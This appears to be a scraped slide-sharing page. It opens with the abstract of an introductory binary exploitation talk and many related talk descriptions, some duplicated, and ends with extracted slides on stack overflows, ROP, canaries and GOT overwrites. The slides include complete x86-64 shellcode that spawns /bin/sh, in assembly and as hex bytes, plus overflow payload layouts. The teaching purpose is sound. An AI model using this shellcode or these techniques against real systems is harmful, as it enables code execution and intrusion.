This event is part of our ongoing series about IT Security. In this session, Carl Svensson, a security professional working in the Google Offensive Security team, gives us an introduction to Binary Exploitation. Watch the recording at https://dscmunich.de/binexp
Specializing the Data Path - Hooking into the Linux Network StackKernel TLV
Ever needed to add your custom logic into the network stack?
Ever hacked the network stack but wasn't certain you're doing it right?
Shmulik Ladkani talks about various mechanisms for customizing packet processing logic to the network stack's data path.
He covers covering topics such as packet sockets, netfilter hooks, traffic control actions and ebpf. We will discuss their applicable use-cases, advantages and disadvantages.
Shmulik Ladkani is a Tech Lead at Ravello Systems.
Shmulik started his career at Jungo (acquired by NDS/Cisco) implementing residential gateway software, focusing on embedded Linux, Linux kernel, networking and hardware/software integration.
51966 coffees and billions of forwarded packets later, with millions of homes running his software, Shmulik left his position as Jungo’s lead architect and joined Ravello Systems (acquired by Oracle) as tech lead, developing a virtual data center as a cloud service. He's now focused around virtualization systems, network virtualization and SDN.
Introduction in Security given by Bart Van Bos at Nalys.
Topics:
- Buffer overflows in C
- Counter measures
- Life demo of 2 attacks
- Shellcode generation
Specializing the Data Path - Hooking into the Linux Network StackKernel TLV
Ever needed to add your custom logic into the network stack?
Ever hacked the network stack but wasn't certain you're doing it right?
Shmulik Ladkani talks about various mechanisms for customizing packet processing logic to the network stack's data path.
He covers covering topics such as packet sockets, netfilter hooks, traffic control actions and ebpf. We will discuss their applicable use-cases, advantages and disadvantages.
Shmulik Ladkani is a Tech Lead at Ravello Systems.
Shmulik started his career at Jungo (acquired by NDS/Cisco) implementing residential gateway software, focusing on embedded Linux, Linux kernel, networking and hardware/software integration.
51966 coffees and billions of forwarded packets later, with millions of homes running his software, Shmulik left his position as Jungo’s lead architect and joined Ravello Systems (acquired by Oracle) as tech lead, developing a virtual data center as a cloud service. He's now focused around virtualization systems, network virtualization and SDN.
Introduction in Security given by Bart Van Bos at Nalys.
Topics:
- Buffer overflows in C
- Counter measures
- Life demo of 2 attacks
- Shellcode generation
My talk about Tarantool and Lua at Percona Live 2016Konstantin Osipov
In my talk I will focus on a practical use case: task queue
application, using Tarantool as an application server and a
database.
The idea of the task queue is that producers put tasks (objects)
into a queue, and consumers take tasks, perform them, mark as
completed.
The queue must guarantee certain properties: if a consumer failed,
a task should return to the queue automatically, a task can't be
taken by more than one consumer, priorities on tasks should be
satisfied.
With Tarantool, a task queue is a distributed networked
application: there are multiple consumer/producer endpoints
(hosts) through which a user can interact with the queue.
The queue itself is a fault-tolerant distributed database:
every task is stored in Tarantool database and replicated
in multiple copies.
If a machine goes down, the state of a task is tracked on a
replica, and the user can continue working with the
queue through a replica.
Total power failure is also not an issue, since tasks are stored
persistently on disk with transactional semantics.
Performance of such an application is in hundreds of thousands of
transactions per second.
At the same time, the queue is highly customizable, since it's
written entirely in Lua, is a Lua rock, but the code is running
inside the database. This is the strength of Lua:
one size doesn't have to fit all, and you don't have to sacrifice
performance if you need customization.
The second part of the talk will be about implementation details,
performance numbers, a performance comparison with other queue
products (beanstalkd, rabbitmq) in particular, and an overview
of the implementation from language bindings point of view: how we
make database API available in Lua, what are the challenges and
performance hurdles of such binding.
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...Area41
Whether it's for malware analysis, vulnerability research or emulation, having a correct disassembly of a binary is the essential thing you need when you analyze code. Unfortunately, many people are not aware that there are a lot of opcodes that are rarely used in normal files, but valid for execution, but also several common opcodes have rarely seen behaviours, which could lead to wrong conclusions after an improper analysis.
For this research, I decided to go back to the basics and study assembly from scratch, covering all opcodes, whether they're obsolete or brand new, common or undocumented. This helped me to find bugs in all the disassemblers I tried, including the most famous ones. This presentation introduces the funniest aspects of the x86 CPUs, that I discovered in the process, including unexpected or rarely known opcodes and undocumented behavior of common opcodes.
The talk will also cover opcodes that are used in armored code (malware/commercial protectors) that are likely to break tools (disassemblers, analyzers, emulators, tracers,...), and introduce some useful tools and documents that were created in the process of the research.
Bio: Ange Albertini is a reverse-engineering and assembly language enthusiast for around 20 years, and malware analyst for 6 years. He has a technical blog, where he shares experimental sources files, and some infographics that are useful in his daily work.
Making OpenBSD Useful on the Octeon Network Gear by Paul Iroftieurobsdcon
Abstract
My work on the Octeon port made possible for OpenBSD to run on the D-Link DSR line of mid-range routers and also improved all supported models through the drivers I wrote. I'm continuing my work on improving the OpenBSD experience on the Octeon products by enhancing network support (including advanced switch support among other things) and adding disk support via USB and CFI. This presentation summarizes the developments I brought and the obstacles I faced.
Speaker bio
Paul is an OpenBSD developer since 2008, involved in ACPI, suspend and resume, power management, mips64, porting and currently with a keen interest in the Loongson and Octeon platforms. Currently he's a freelancer and also studying for his PhD in Parallel Algorithms for Signal Processing. In the past he worked for a telephony company developing VoIP, Voicemail and related software and after that as an antivirus engine developer and reverse engineer. In his spare time he enjoys a good game of Go, running or hiking.
How to write rust instead of c and get away with itFlavien Raynaud
Ever tried optimizing a slow Python application and thought: “Oh! I wish I could just write this bit it in Rust”? Well, turns out you can! Let’s discuss why Rust is a better choice than C, how to use Rust to make your apps lightning fast and how to get away with it; without your users even noticing.
As Infrastructure Engineers at Yelp, the challenge we face everyday is: scale. Yelp is mostly a Python shop, so our work often revolves around making Python applications run faster. Until now, we have been using different techniques: faster interpreters, or, more often, C code.
Given its safety guarantees, performance and promise of better tooling than C, we decided we had to give Rust a try. The initial results helped reinforce that there was a lot of opportunity for Rust to play an important role in our production code.
Yelp heavily relies on the Apache Avro serialization format for its internal infrastructure. During the talk, we will show how we implemented avro-rs, an Avro serialization/deserialization library in Rust, how we were able to call it from Python (and in theory from any other language) with very little code, using tools such as cbindgen, CFFI and Milksnake.
This talk would outline how easy it is to write interoperable code in a performant language like Rust and why a company should invest in Rust, over the many other available alternatives, to run production services.
Packet Filter is OpenBSD's system for filtering TCP/IP traffic and doing Network Address Translation. PF is also capable of normalizing and conditioning TCP/IP traffic, as well as providing bandwidth control and packet prioritization.
Asynchronous single page applications without a line of HTML or Javascript, o...Robert Schadek
AngularJS, together with Node.js, is an extremely powerful combination for building single page applications. Unfortunately, its development requires writing HTML and Javascript, which is tedious and error prone. By using vibe.d, HTML is no longer necessary, and the developers can use the full power of a static-typed language for the development of the backend. Substituting Javascript with Typescript in addition to a little bit of CTFE D magic then removes the need for redundant data type declarations, and makes everything statically typed. At the end of the talk, the attendee will have witnessed the creation of a statically typed, asynchronous single page application that required little extra typing than its dynamically typed equivalent. Additionally, the attendees will be motivated to explore the presented combination of frameworks as a viable desktop application UI framework.
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
This presentation covers utilizing VMwares (GDB) debugging protocol to invasive inject commands into a Linux-x64 target. Automatic detection of kernel API is performed to locate _vmalloc & call_usermodehelper* functions across all 3x and 4x kernels.
Modern computationally intensive tasks are rarely bottlenecked on the absolute performance of your processor cores, the real bottleneck in 2012 is getting data out of memory. CPU Caches are designed to alleviate the difference in performance between CPU Core Clockspeed and main memory clockspeed, but developers rarely understand how this interaction works or how to measure or tune their application accordingly.
This Talk aims to solve that by:
1. Describing how the CPU caches work in the latest Intel Hardware.
2. Showing people what and how to measure in order to understand the caching behaviour of their software.
3. Giving examples of how this affects Java Program performance and what can be done to address things.
My talk about Tarantool and Lua at Percona Live 2016Konstantin Osipov
In my talk I will focus on a practical use case: task queue
application, using Tarantool as an application server and a
database.
The idea of the task queue is that producers put tasks (objects)
into a queue, and consumers take tasks, perform them, mark as
completed.
The queue must guarantee certain properties: if a consumer failed,
a task should return to the queue automatically, a task can't be
taken by more than one consumer, priorities on tasks should be
satisfied.
With Tarantool, a task queue is a distributed networked
application: there are multiple consumer/producer endpoints
(hosts) through which a user can interact with the queue.
The queue itself is a fault-tolerant distributed database:
every task is stored in Tarantool database and replicated
in multiple copies.
If a machine goes down, the state of a task is tracked on a
replica, and the user can continue working with the
queue through a replica.
Total power failure is also not an issue, since tasks are stored
persistently on disk with transactional semantics.
Performance of such an application is in hundreds of thousands of
transactions per second.
At the same time, the queue is highly customizable, since it's
written entirely in Lua, is a Lua rock, but the code is running
inside the database. This is the strength of Lua:
one size doesn't have to fit all, and you don't have to sacrifice
performance if you need customization.
The second part of the talk will be about implementation details,
performance numbers, a performance comparison with other queue
products (beanstalkd, rabbitmq) in particular, and an overview
of the implementation from language bindings point of view: how we
make database API available in Lua, what are the challenges and
performance hurdles of such binding.
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...Area41
Whether it's for malware analysis, vulnerability research or emulation, having a correct disassembly of a binary is the essential thing you need when you analyze code. Unfortunately, many people are not aware that there are a lot of opcodes that are rarely used in normal files, but valid for execution, but also several common opcodes have rarely seen behaviours, which could lead to wrong conclusions after an improper analysis.
For this research, I decided to go back to the basics and study assembly from scratch, covering all opcodes, whether they're obsolete or brand new, common or undocumented. This helped me to find bugs in all the disassemblers I tried, including the most famous ones. This presentation introduces the funniest aspects of the x86 CPUs, that I discovered in the process, including unexpected or rarely known opcodes and undocumented behavior of common opcodes.
The talk will also cover opcodes that are used in armored code (malware/commercial protectors) that are likely to break tools (disassemblers, analyzers, emulators, tracers,...), and introduce some useful tools and documents that were created in the process of the research.
Bio: Ange Albertini is a reverse-engineering and assembly language enthusiast for around 20 years, and malware analyst for 6 years. He has a technical blog, where he shares experimental sources files, and some infographics that are useful in his daily work.
Making OpenBSD Useful on the Octeon Network Gear by Paul Iroftieurobsdcon
Abstract
My work on the Octeon port made possible for OpenBSD to run on the D-Link DSR line of mid-range routers and also improved all supported models through the drivers I wrote. I'm continuing my work on improving the OpenBSD experience on the Octeon products by enhancing network support (including advanced switch support among other things) and adding disk support via USB and CFI. This presentation summarizes the developments I brought and the obstacles I faced.
Speaker bio
Paul is an OpenBSD developer since 2008, involved in ACPI, suspend and resume, power management, mips64, porting and currently with a keen interest in the Loongson and Octeon platforms. Currently he's a freelancer and also studying for his PhD in Parallel Algorithms for Signal Processing. In the past he worked for a telephony company developing VoIP, Voicemail and related software and after that as an antivirus engine developer and reverse engineer. In his spare time he enjoys a good game of Go, running or hiking.
How to write rust instead of c and get away with itFlavien Raynaud
Ever tried optimizing a slow Python application and thought: “Oh! I wish I could just write this bit it in Rust”? Well, turns out you can! Let’s discuss why Rust is a better choice than C, how to use Rust to make your apps lightning fast and how to get away with it; without your users even noticing.
As Infrastructure Engineers at Yelp, the challenge we face everyday is: scale. Yelp is mostly a Python shop, so our work often revolves around making Python applications run faster. Until now, we have been using different techniques: faster interpreters, or, more often, C code.
Given its safety guarantees, performance and promise of better tooling than C, we decided we had to give Rust a try. The initial results helped reinforce that there was a lot of opportunity for Rust to play an important role in our production code.
Yelp heavily relies on the Apache Avro serialization format for its internal infrastructure. During the talk, we will show how we implemented avro-rs, an Avro serialization/deserialization library in Rust, how we were able to call it from Python (and in theory from any other language) with very little code, using tools such as cbindgen, CFFI and Milksnake.
This talk would outline how easy it is to write interoperable code in a performant language like Rust and why a company should invest in Rust, over the many other available alternatives, to run production services.
Packet Filter is OpenBSD's system for filtering TCP/IP traffic and doing Network Address Translation. PF is also capable of normalizing and conditioning TCP/IP traffic, as well as providing bandwidth control and packet prioritization.
Asynchronous single page applications without a line of HTML or Javascript, o...Robert Schadek
AngularJS, together with Node.js, is an extremely powerful combination for building single page applications. Unfortunately, its development requires writing HTML and Javascript, which is tedious and error prone. By using vibe.d, HTML is no longer necessary, and the developers can use the full power of a static-typed language for the development of the backend. Substituting Javascript with Typescript in addition to a little bit of CTFE D magic then removes the need for redundant data type declarations, and makes everything statically typed. At the end of the talk, the attendee will have witnessed the creation of a statically typed, asynchronous single page application that required little extra typing than its dynamically typed equivalent. Additionally, the attendees will be motivated to explore the presented combination of frameworks as a viable desktop application UI framework.
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
This presentation covers utilizing VMwares (GDB) debugging protocol to invasive inject commands into a Linux-x64 target. Automatic detection of kernel API is performed to locate _vmalloc & call_usermodehelper* functions across all 3x and 4x kernels.
Modern computationally intensive tasks are rarely bottlenecked on the absolute performance of your processor cores, the real bottleneck in 2012 is getting data out of memory. CPU Caches are designed to alleviate the difference in performance between CPU Core Clockspeed and main memory clockspeed, but developers rarely understand how this interaction works or how to measure or tune their application accordingly.
This Talk aims to solve that by:
1. Describing how the CPU caches work in the latest Intel Hardware.
2. Showing people what and how to measure in order to understand the caching behaviour of their software.
3. Giving examples of how this affects Java Program performance and what can be done to address things.
Доклад рассказывает об устройстве и опыте применения инструментов динамического тестирования C/C++ программ — AddressSanitizer, ThreadSanitizer и MemorySanitizer. Инструменты находят такие ошибки, как использование памяти после освобождения, обращения за границы массивов и объектов, гонки в многопоточных программах и использования неинициализированной памяти.
Nadav Markus goes over the path from a simple crash POC provided by Google Project Zero (for CVE-2015-7547), to a fully weaponized exploit.
He explores how an attacker can utilize the behavior of the Linux kernel in order to bypass ASLR, allowing an attacker to remotely execute code on vulnerable targets.
Agenda:
This talk will provide an in-depth review of the usage of canaries in the kernel and the interaction with userspace, as well as a short review of canaries and why they are needed in general so don't be afraid if you never heard of them.
Speaker:
Gil Yankovitch, CEO, Chief Security Researcher from Nyx Security Solutions
Binary art - Byte-ing the PE that fails you (extended offline version)Ange Albertini
This is the extended offline version of
an overview of the Portable Executable format and its malformations
presented at Hashdays, in Lucerne, on the 3rd November 2012
direct download link: http://corkami.googlecode.com/files/ange_albertini_hashdays_2012.zip
Linux kernel tracing superpowers in the cloudAndrea Righi
The Linux 4.x series introduced a new powerful engine of programmable tracing (BPF) that allows to actually look inside the kernel at runtime. This talk will show you how to exploit this engine in order to debug problems or identify performance bottlenecks in a complex environment like a cloud. This talk will cover the latest Linux superpowers that allow to see what is happening “under the hood” of the Linux kernel at runtime. I will explain how to exploit these “superpowers” to measure and trace complex events at runtime in a cloud environment. For example, we will see how we can measure latency distribution of filesystem I/O, details of storage device operations, like individual block I/O request timeouts, or TCP buffer allocations, investigating stack traces of certain events, identify memory leaks, performance bottlenecks and a whole lot more.
Profilers find performance bottlenecks in your app but provide confusing information. Let's give you insights into how your profiler and your app are really interacting. What profiling APIs are available, how they work, and what their implementation on the JVM (OpenJDK) side looks like:
Stack sampling profilers: stop motion view of your app
GetCallTrace(JVisualVM case study): The official stack sampling API
Safepoints and safepoint sampling bias
AsyncGetCallTrace(Honest Profiler Case Study): The unofficial API
JVM Profilers vs System Profilers: No API needed?
An introduction to exploit development.
I gave this talk at Hack the North 2014, and most of this information is pulled out of classics like Smashing the Stack for Fun and Profit, so there shouldn't be anything novel in here.
Presenter notes: https://www.dropbox.com/s/lq6oxuw1s3bhoun/Advanced%20Linux%20Game%20Programming%20%E2%80%93%20Presenter%20Notes.pdf
Ever since the advent of SteamOS, interest in game development for Linux has seen an increase. This lecture aims to address some more advanced issues encountered by programmers on this platform, beyond the very basic Linux setup, and drawing from over a year and two and a half games of experience in the subject. The areas discussed will be:
• Executable build improvements
• Crash handling and reporting
• Memory debugging
• OpenGL instrumentation and debugging
• Various caveats, tips and tricks.
Similar to [DSC] Introduction to Binary Exploitation (20)
Welocme to ViralQR, your best QR code generator.ViralQR
Welcome to ViralQR, your best QR code generator available on the market!
At ViralQR, we design static and dynamic QR codes. Our mission is to make business operations easier and customer engagement more powerful through the use of QR technology. Be it a small-scale business or a huge enterprise, our easy-to-use platform provides multiple choices that can be tailored according to your company's branding and marketing strategies.
Our Vision
We are here to make the process of creating QR codes easy and smooth, thus enhancing customer interaction and making business more fluid. We very strongly believe in the ability of QR codes to change the world for businesses in their interaction with customers and are set on making that technology accessible and usable far and wide.
Our Achievements
Ever since its inception, we have successfully served many clients by offering QR codes in their marketing, service delivery, and collection of feedback across various industries. Our platform has been recognized for its ease of use and amazing features, which helped a business to make QR codes.
Our Services
At ViralQR, here is a comprehensive suite of services that caters to your very needs:
Static QR Codes: Create free static QR codes. These QR codes are able to store significant information such as URLs, vCards, plain text, emails and SMS, Wi-Fi credentials, and Bitcoin addresses.
Dynamic QR codes: These also have all the advanced features but are subscription-based. They can directly link to PDF files, images, micro-landing pages, social accounts, review forms, business pages, and applications. In addition, they can be branded with CTAs, frames, patterns, colors, and logos to enhance your branding.
Pricing and Packages
Additionally, there is a 14-day free offer to ViralQR, which is an exceptional opportunity for new users to take a feel of this platform. One can easily subscribe from there and experience the full dynamic of using QR codes. The subscription plans are not only meant for business; they are priced very flexibly so that literally every business could afford to benefit from our service.
Why choose us?
ViralQR will provide services for marketing, advertising, catering, retail, and the like. The QR codes can be posted on fliers, packaging, merchandise, and banners, as well as to substitute for cash and cards in a restaurant or coffee shop. With QR codes integrated into your business, improve customer engagement and streamline operations.
Comprehensive Analytics
Subscribers of ViralQR receive detailed analytics and tracking tools in light of having a view of the core values of QR code performance. Our analytics dashboard shows aggregate views and unique views, as well as detailed information about each impression, including time, device, browser, and estimated location by city and country.
So, thank you for choosing ViralQR; we have an offer of nothing but the best in terms of QR code services to meet business diversity!
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
6. Proprietary
Proprietary
What is an Exploit?
● Unintended behaviour
● State machine
○ Initial state
○ Reachable state
○ Invalid state
● Vulnerability
○ Unintended transition (bug)
○ Enabling an exploit
● Exploit
○ Transition to an Invalid state
○ "Dangerous" subset
7. Proprietary
Proprietary
A Note on Data
● We organize bits into groups - nibble, byte, word, dword, qword
● Bits are interpreted as integers, text, code, addresses, etc.
● Same data, different interpretations - Context determines
● Remember endianness - Little vs big
65, 66, 67, 68
"ABCD"
inc ecx; inc edx; inc ebx; inc esp
0x44434241 = 1145258561
Little: 0x44332211 = 0x11 0x22 0x33 0x44
Big: 0x44332211 = 0x44 0x33 0x22 0x11
8. Proprietary
Proprietary
Where are We?
● Physics - Maxwell’s equations
● Circuits - Gates, flip-flops, wires
● Micro-architecture - Internals of CPU
● Machine code - Assembly translated to bytes
● Low-level code - C, Rust
● Mid-level code - Java, C#
● High-level code - Python, Javascript
12. Proprietary
Proprietary
● Architecture specific
● x86, 32 bit, 64 bit
● Arguments
○ 32 bit: stack in reverse order
○ 64 bit: first few in registers
● Stack frame - base pointer
x86 Calling convention
call 0xCAFEC0DE
...
push eip+5
jmp 0xCAFEC0DE
call rip+0x1337
...
push rip+5
jmp rip+0x1337
ret pop eip
ret pop rip
f(a, b) push b; push a
call f
f(a, b) mov rdi a; mov rsi b;
call f
14. Proprietary
Proprietary
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address
Stack buffer Overflow
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[AAAABBBBCCCCDDDD]
[EEEEFFFF]
[GGGGHHHH]
[JJJJKKKK]
15. Proprietary
Proprietary
● Code that launches a shell
● Can also do other things
● Mostly written in C or ASM
● Needs to be location independent
Shellcode
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall
0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f
0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7
0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
16. Proprietary
Proprietary
● No protections present
● No longer viable
● A simple attack
○ Inject code
○ Overwrite return address with
shellcode location
Stack buffer overflow -96
void vuln() {
long local1;
char buf[16];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
0x00007FFFDEADC0DE:
[0x48 0x31 0xd2 0x48 ...]
[...]
[... 0x3b 0x0f 0x05]
[0x00007FFFDEADC0DE]
17. Proprietary
Proprietary
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
○ NOP sled
Shellcode placement
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (12 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x00007FFFDEADC0DE:
[...] [...]
[...]
[0x00007FFFDEADC102]
[0x48 0x31 0xd2 …]
18. Proprietary
Proprietary
● Address Space Layout Randomization
● Randomize location of stack and heap
○ 32 bit: 12 bit entropy
○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
○ Gadgets
Protection: ASLR -01
0x00007FFFCAFECAFE:
jmp rsp
$ uname -a
Linux pwnbox 5.4.0-12.15-generic...
[buf (16 bytes)]
[local1 (8 bytes)]
[saved bp (8 bytes)]
[return address (8 bytes)]
[prev frame (? bytes)]
0x????????:
[...] [...]
[...]
[0x00007FFFCAFECAFE]
[0x48 0x31 0xd2 …]
19. Proprietary
Proprietary
● Adds permission bits to memory
○ Code: RX
○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location know
● Gadgets
○ Return-oriented programming
Protection: NX/DEP -97
0x4000104A:
...
pop eax
ret
0x4000106A:
...
pop ebx
pop ecx
ret
0x????????:
[AAAA...DDDD]
[EEEE]
[FFFF]
[0x4000104A]
[0xDEADBEEF]
[0x4000106A]
[0xCAFEBABE]
[0xFEEDF00D]
eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D
20. Proprietary
Proprietary
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
○ Memory leak
○ Forking servers
Protection: StackGuard -98
void vuln() {
long local1;
char buf[12];
fgets(buf);
}
*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========
SECRET = ???
[...] [...]
[SECRET]
[saved bp (8 bytes)]
[return address (8 bytes)]
[...] [...]
[0x4141414141414141]
[0x4141414141414141]
[0x00007FFFDEADC0DE]
void vuln() {
push_cookie();
long local1;
char buf[12];
fgets(buf);
check_cookie();
}
21. Proprietary
Proprietary
● Program Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function
GOT/PLT Overwrite
...
call printf@plt
...
printf@plt:
jmp [printf@got]
printf@got: 0x7FFFC0DECAFE
printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...
32. Proprietary
Want to try it out?
Capture the Flag Wargames Community
https://capturetheflag.withgoogle.com
https://ctftime.org
https://picoctf.com
https://github.com/zardus/wargame-nexus
https://pwnable.kr
https://overthewire.org
CTF players Discord:
https://discord.gg/ArjWjvctft
34. Proprietary
Interested in
Google?
Internships and full-time positions:
https://careers.google.com/students
Questions about working at Google,
specifically security:
Email zetatwo@google.com or
Twitter @zetatwo